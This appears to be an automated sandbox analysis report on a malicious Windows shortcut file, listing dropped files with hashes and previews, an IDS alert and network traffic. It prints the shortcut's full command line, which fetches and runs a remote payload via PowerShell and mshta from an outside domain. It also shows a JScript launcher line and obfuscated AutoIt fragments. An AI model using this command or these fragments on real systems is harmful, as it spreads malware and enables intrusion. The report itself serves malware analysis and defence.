                                                                              Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                              Process:C:\Windows\System32\mshta.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):85804
                                                                              Entropy (8bit):4.948174305592025
                                                                              Encrypted:false
                                                                              SSDEEP:768:fsnZcnsXsnZcnsywHAwE9IHeyxzwcBhiI2eCeklhe98eKr5ee/qS8MOeK7/r0EYo:EZcbZcnBZcdZc
                                                                              MD5:6DCA71F1033503CECF5E1E4C11947AFE
                                                                              SHA1:7ADB1B0E80B9CC7FAF8ADCAA2987852137B9358F
                                                                              SHA-256:CB88524BDA1EA42618A41985C8D3BBE278C9BD8F9D6AC2BDFE7BDAAF4B2B1886
                                                                              SHA-512:1CDC3F51A8570BDE3E956AC9D36015DC7866C30B8BB31956BFE22C810C131774B0322969F7EF995461F82096342338BB1AEB24E66BA204670BB4EDF9AA344599
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 39%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..W..W..C...V..C...U..C...C..C...P..W..s..C...V..C.|.V..C...V..RichW..........................PE..L...C.05............................@........ ....@..........................`......._....@...... ...........................0..P....@.......................P..@.......T............................................0...............................text...t........................... ..`.data...p.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..@....P.......&..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):0.34726597513537405
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlll:Nll
                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                              Malicious:false
                                                                              Preview:@...e...........................................................
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):246
                                                                              Entropy (8bit):3.5097251598291805
                                                                              Encrypted:false
                                                                              SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8sKDawW9:Qw946cPbiOxDlbYnuRKS8
                                                                              MD5:FB34BE5D1CAFA73FBD48CEA1A5B88092
                                                                              SHA1:7E7B86233E28439EB976E0B929AB3E6DF44BBC41
                                                                              SHA-256:F98741F9A1607C46B01908053B189D6CD7C6EC145009BD2BC5EAE8244EC45715
                                                                              SHA-512:CA62AF0BAA4DC3A489F6750213C29BD8C4439BFA540828088B318E1B4D75BA1DAD712369EA4060E17CD1837CE06F290E4C5B0FFE52A3F8746C7F28C3D6FB8BC7
                                                                              Malicious:false
                                                                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.8./.1.2./.2.0.2.4. . .1.5.:.0.0.:.2.7. .=.=.=.....
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:ASCII text, with very long lines (393)
                                                                              Category:dropped
                                                                              Size (bytes):16525
                                                                              Entropy (8bit):5.345946398610936
                                                                              Encrypted:false
                                                                              SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                              MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                              SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                              SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                              SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                              Malicious:false
                                                                              Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):15114
                                                                              Entropy (8bit):5.341858590640334
                                                                              Encrypted:false
                                                                              SSDEEP:384:ZYtaFrULDcVHMGpbcSC41nMhlK3PSMQao7WCgsAaOqOmo9dl/Smb3u3OvcWR3e23:oid
                                                                              MD5:45EC35C829121F7AE685D0A4D8B1BAFC
                                                                              SHA1:9778B31FE9C02ACF18720653D4C7379AF65290E0
                                                                              SHA-256:D414C185BB8871D6D007FBE5BB67470C736C0FA52762594D83C59FB6DF9012E9
                                                                              SHA-512:580E50D34EC03A4C35C500F6A0A2A0BEF2B442BE7B992C6F639EBB86DFB6D2CA838F31FC925A3921E8EC7794EBF1B2BEF888D99759CE5AA3AA1B633334618454
                                                                              Malicious:false
                                                                              Preview:SessionID=6295eab8-7103-49ba-b642-32c16d7cda25.1734552020431 Timestamp=2024-12-18T15:00:20:431-0500 ThreadID=8004 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=6295eab8-7103-49ba-b642-32c16d7cda25.1734552020431 Timestamp=2024-12-18T15:00:20:431-0500 ThreadID=8004 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=6295eab8-7103-49ba-b642-32c16d7cda25.1734552020431 Timestamp=2024-12-18T15:00:20:432-0500 ThreadID=8004 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=6295eab8-7103-49ba-b642-32c16d7cda25.1734552020431 Timestamp=2024-12-18T15:00:20:432-0500 ThreadID=8004 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=6295eab8-7103-49ba-b642-32c16d7cda25.1734552020431 Timestamp=2024-12-18T15:00:20:432-0500 ThreadID=8004 Component=ngl-lib_NglAppLib Description="SetConf
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):29752
                                                                              Entropy (8bit):5.382643048227498
                                                                              Encrypted:false
                                                                              SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rY:JCJ
                                                                              MD5:96B40FB264DA890C10E4A04C8486F961
                                                                              SHA1:5B6D2CB53AFFD52526455F782879CC1F33D8B49D
                                                                              SHA-256:12D96F3B1F5DE447471A9FC99B1E47564202269F55C62BBC0206CB6349327AD5
                                                                              SHA-512:BCE9FCA8EC58EC9E518C4D00EE3EB1AB2D7450EA316BB1ACFB4B7AEFC348A5D6A8AFA11075CB79DEA226E1E04B5763428379FAE414510810C95850B4C4A5A0BF
                                                                              Malicious:false
                                                                              Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                              Category:dropped
                                                                              Size (bytes):1419751
                                                                              Entropy (8bit):7.976496077007677
                                                                              Encrypted:false
                                                                              SSDEEP:24576:/b5mOWL07oYGZiYIGNPZdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:D5bWLxYGZiZGH3mlind9i4ufFXpAXkru
                                                                              MD5:7FB8C020A0266753ACC0B69FA92C3C55
                                                                              SHA1:D9211BBA529E180E5BE279F3879F8449590F7648
                                                                              SHA-256:AF4940C6022D857E07BA5C9075960E95C595459E3DCE0F57881311021F4095D3
                                                                              SHA-512:AEB38E3277247703294B2FB708A720B6AA85A6EE77284B19FE3A2A2F6FD735E1052A1B794D5EF175AB5BE48D15B69A1AB920812DC7C5B9143FDC3AEBF3902198
                                                                              Malicious:false
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                              Category:dropped
                                                                              Size (bytes):386528
                                                                              Entropy (8bit):7.9736851559892425
                                                                              Encrypted:false
                                                                              SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                              Malicious:false
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                              Category:dropped
                                                                              Size (bytes):1407294
                                                                              Entropy (8bit):7.97605879016224
                                                                              Encrypted:false
                                                                              SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLcGZtwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLcGZa
                                                                              MD5:22B260CB8C51C0D68C6550E4B061E25A
                                                                              SHA1:DF9A5999C58A8D5ADBB3F8D1111EAB9E4778637E
                                                                              SHA-256:DAB1231CC22DAB591EBB91C853E3EE41C10D3DA85D2EFAB67E9A52CCB3A3A5A0
                                                                              SHA-512:503218D83C511A7F7CEA8BC171921D1435664B964F01A8C77DC0F4D0196DD2815D9444DA98278E1369552D004E9B091DD9B89663209F0C52ACB97FCE6AFFE7A9
                                                                              Malicious:false
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                              Category:dropped
                                                                              Size (bytes):758601
                                                                              Entropy (8bit):7.98639316555857
                                                                              Encrypted:false
                                                                              SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                              MD5:3A49135134665364308390AC398006F1
                                                                              SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                              SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                              SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                              Malicious:false
                                                                              Process:C:\Users\Public\Guard.exe
                                                                              File Type:ASCII text, with very long lines (1266)
                                                                              Category:dropped
                                                                              Size (bytes):1240100
                                                                              Entropy (8bit):5.144277296271024
                                                                              Encrypted:false
                                                                              SSDEEP:12288:D8V+jcfSgyuH7Kixj+UXk8pL6OvsEmeXBWD4LkPq0e718m3UDd:DcB7HxicaEmEQD3I1jUZ
                                                                              MD5:078A35D34863F9421F702C3044DA8A1F
                                                                              SHA1:1D34A5EF73992231F1E5857A462359596647E0F6
                                                                              SHA-256:6E32AE2A7776564163BE157BAEE93FCB156A5030D620C71D9FCF33D9A7CBC925
                                                                              SHA-512:67EEB87AEE2567513FC6D5AE241E62D73874980EC18BB77C46DF4191A2EC64A6DB1200F7541B0F6E908B66D39ACE1D483CD1E33E90C165A6DBA01C35536E1541
                                                                              Malicious:false
                                                                              Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]
                                                                              Process:C:\Users\Public\Guard.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):184
                                                                              Entropy (8bit):4.736154105743425
                                                                              Encrypted:false
                                                                              SSDEEP:3:RiMIpGXfeNH5E5wWAX+Ro6p4EkD5yKXW/Zi+0/RaMl85uWAX+Ro6p4EkD5yKXW/f:RiJbNHCwWDKaJkDrXW/Zz0tl8wWDKaJX
                                                                              MD5:612D28A7A2758BAAF54DB34272446F87
                                                                              SHA1:D4671632FC2141EF2AB2455F8923BC5197B2FD68
                                                                              SHA-256:94A83DD87CE7268703585A40C52491DDC7D332380B82832951DED047AAE6D73A
                                                                              SHA-512:B4B64908C674F92F5D4B1E761E123957E8D5CD6C3F433D2D5C6ADD19101FD0610EE968222D4CED31E8F21F7F022D880E7E723E4171BC7DB18C37A2000A58565B
                                                                              Malicious:true
                                                                              Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")
                                                                              Process:C:\Users\Public\Guard.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):893608
                                                                              Entropy (8bit):6.62028134425878
                                                                              Encrypted:false
                                                                              SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                              MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                              SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                              SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                              SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PDF document, version 1.3, 3 pages
                                                                              Category:dropped
                                                                              Size (bytes):3986
                                                                              Entropy (8bit):7.456004459274474
                                                                              Encrypted:false
                                                                              SSDEEP:96:6RHrsQ6Fc+YDxP8gpOwEBdOujxeB7knVQzWKB5Y+74C0sLJRSo:6trcPYDigiBdfetAMxm8BPRSo
                                                                              MD5:F1D1BF7BA473B16F95B0BAFE0E09A402
                                                                              SHA1:33CBC0601595EC233C96D8181D12CEAE9CEECE7A
                                                                              SHA-256:CFBACCD2CC5E9FCE35F05E87D7F5D8DF85CA47ECF0E8FDC44CFB701A70EB0DFE
                                                                              SHA-512:559918229442151AF1C1C48D55052BC94BB28E664CE5190B40BF0CE10A3381F1D9773F3FC4E1848CB7A5E34DE4279533E64F667F58F473DB61C824E861CF6F90
                                                                              Malicious:false
                                                                              Preview:%PDF-1.3.3 0 obj.<</Type /Page./Parent 1 0 R./Resources 2 0 R./Contents 4 0 R>>.endobj.4 0 obj.<</Filter /FlateDecode /Length 879>>.stream.x.}TM..:...+..U...?...P..+.(H...bO....$%..{f.8N..'.F...3...*.e..W..x.1...I...|X.4iD.B.".a.../f@0+....{.^9...(.Tk....k..4Hx4.U........3H..#.U.."..H...V$.k....HO ]... .....X.J<.......{...^&V.5|..:....z:....j2.7. .n.....=QA......ai..<H....|...#?.]............H...W%Y..{.k....CY)Xg>$....v.b.+c.o....),.6.E........>..>.Rk..~..n.I...].k........V...G.d...B..v.Ri......Or.....E*)sylC.....${.v.\ .*.**.\...#..a&pP~.Q.G92..WJ#t.Pf.....,.]..n..)../.a0...<.$...a..|&...O.Y-....N.=..R..3M.&D..a...j....>!..ZJ..G.c...yc..x.....7w......d.E.....j....|.E&.X.Q.,J>..)......7.%Z...9u....K7...\u.#FA..l.......C.@...N..^.e]dM).8}...|.cV...3....>..V....ufq....r..w-....,HU]..e.h.. .4.....8j....c.....?..L.t.c.f..i..$.{..I".vRc..[..\.............v..]..^.<MKQL..+......4...v...I\..6 ..H.........t...............^n.!O.\..>.o./.QW'....~.
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):98
                                                                              Entropy (8bit):4.915531212533357
                                                                              Encrypted:false
                                                                              SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5yKXW/Zi+URAAy:HRYF5yjowkn23yKXW/Zzyy
                                                                              MD5:56D029782506F3E1F7EC40780D1DA27F
                                                                              SHA1:C7E0690DE9B31C951AC212A7E940E460267F2BA1
                                                                              SHA-256:5F412A72A3459ACA6A245DE1A280AB53CA5E6B306FECA32E0DF4B0B9B7863223
                                                                              SHA-512:1C5F108FB4325E4B47E9EE15F5D828569EE90676D5170D6D3B92BD13BD39CCAA68657CBB97761007154C73D2FFCFA8A3582879CB2097A899B22C1C83848A9D92
                                                                              Malicious:true
                                                                              Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1083904
                                                                              Entropy (8bit):6.306473619816267
                                                                              Encrypted:false
                                                                              SSDEEP:24576:DrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaB1T:D2EYTb8atv1orq+pEiSDTj1VyvBa3
                                                                              MD5:567DE19C0E7E3A1FC845E51AC1C1D5D8
                                                                              SHA1:4C4FDEA73E0C98C2C82B6B1232EF7ECF5B99CCD1
                                                                              SHA-256:F1140750BA9FEAD0EF27B715D1BB2AE28864FE611068759F8EF4F8364AF559CB
                                                                              SHA-512:84C3A61A1F7A71E52DFE110CD975F6DA7EA0B2A83FA16F7B46C223ADE7B44D1F299BF0C108268502F144F5C93E0A74AB37B13D24B9540355658119768BF12C2A
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 32%
                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG....>PG.....PG.....PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(.#PG."(..*PG."(..PG.+PF..RG..9I.{PG..9D.*PG..9..*PG.+P.*PG..9E.*PG.Rich+PG.........................PE..d....^g.........."......4...R.......T.........@....................................qR....`...@...............@..............................\..|........@...@..Ho..............t...Pp..........................(...pp...............P..8............................text...(3.......4.................. ..`.rdata...B...P...D...8..............@..@.data... ........P...|..............@....pdata..Ho...@...p..................@..@.rsrc....@.......B...<..............@..@.reloc..t............~..............@..B................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):55
                                                                              Entropy (8bit):4.306461250274409
                                                                              Encrypted:false
                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                              Malicious:false
                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                              File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=3, Archive, ctime=Sat Dec 7 08:09:57 2019, mtime=Sun Dec 15 09:39:10 2024, atime=Sat Dec 7 08:09:57 2019, length=41472, window=hidenormalshowminimized
                                                                              Entropy (8bit):0.011648986621868687
                                                                              TrID:
                                                                              • Windows Shortcut (20020/1) 100.00%
                                                                              File name:R8CAg00Db8.lnk
                                                                              File size:1'001'146 bytes
                                                                              MD5:cdbfcc4d882ca6b35d7429cebc384245
                                                                              SHA1:ef60efe666dc9eee33d4f847dde57aba34e78bd6
                                                                              SHA256:245641a41fbc20b6ff8e1b199ac9af9a103d6e9215e352f3f9e3aedec889b9e4
                                                                              SHA512:d7b85841d725cb389000a965dc6d74f7b9ca17bf2a5ae9ea0cffdd5de2629f7719658b16eb3807d9be711d68e6d5148bf281ee0328252e0ae89aaf53dc03f275
                                                                              SSDEEP:24:8U8Y3l+hpyAMkA+/44+4MlEPSL6wLaFacabqyI+pu4m:8y3sF/MlEQ6c+acaey3w4
                                                                              TLSH:A325CE0827DA5B78C376AF79683AF302CA717D86EC638F1E059016885495111B8A6FBA
                                                                              File Content Preview:L..................F.... ............Y...N..................................E....P.O. .:i.....+00.../C:\...................V.1......YI...Windows.@........OwH.YxT....(.....................R3..W.i.n.d.o.w.s.....Z.1......Y....System32..B........OwH.Y.X......
                                                                              Icon Hash:070f0f0f0b53c105

                                                                              General

                                                                              Relative Path:..\..\..\..\Windows\System32\forfiles.exe
                                                                              Command Line Argument:/p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep1
                                                                              Icon location:shell32.dll
                                                                              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                              2024-12-18T21:00:18.291783+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49733 | 147.45.49.155 | 80 | TCP
                                                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              Dec 18, 2024 21:00:13.646122932 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:13.646161079 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:13.697057962 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.697082996 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.697243929 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:13.697297096 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.697335958 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:13.998509884 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.998523951 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.998569012 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.998630047 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:13.998656988 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.998694897 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:13.998694897 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:14.243156910 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:14.243175030 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:14.243242025 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:14.243262053 CET44349730147.45.49.155192.168.2.4
